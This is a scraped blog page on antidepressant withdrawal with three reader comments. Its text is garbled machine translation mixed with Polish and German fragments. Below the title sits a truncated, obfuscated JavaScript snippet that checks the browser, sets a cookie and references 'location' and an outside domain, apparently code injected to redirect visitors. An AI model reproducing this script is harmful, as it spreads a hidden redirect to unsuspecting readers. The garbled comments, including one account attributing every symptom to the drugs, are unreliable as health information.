Antidepressant Withdrawal – 10 common symptoms of antydepresantów 2/Odstawienie – objawy

var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','se...



3 Responses to “Antidepressant Withdrawal – 10 common symptoms of antydepresantów 2/Odstawienie – objawy”

  1. Toxic Antidepressants says:

    It may take some time, but you are getting better, Manon. Hang in there.Achten sure to see these two our videos. They will help you a lot :/ watch? V = mea-NdKBpUQ / watch? V = KQtO6HXJfjw

  2. Manon Roy says:

    I’ve been out of antidepressants for almost a year after it for them 13 This video describes exactly what I’m going through at the moment. Wow. Sigh … Life in this moment is very hard. I think about going back to it. Thank you. In this video I sometimes feel like I’m the these symptoms or just feel crazy.

  3. Toxic Antidepressants says:

    Hello, Lorrietyre. Yes, the symptoms you describe are the effects of these drugs. However, our brains have amazing healing powers. Thanks neuroplasticity, even if slow, improvement will continue. We have a forum for people who suffer from psychiatric side effects, and withdrawal. Here you will find lots of help there. 🙂 The address is in the video in the description. Do not give up hope.

Leave a Reply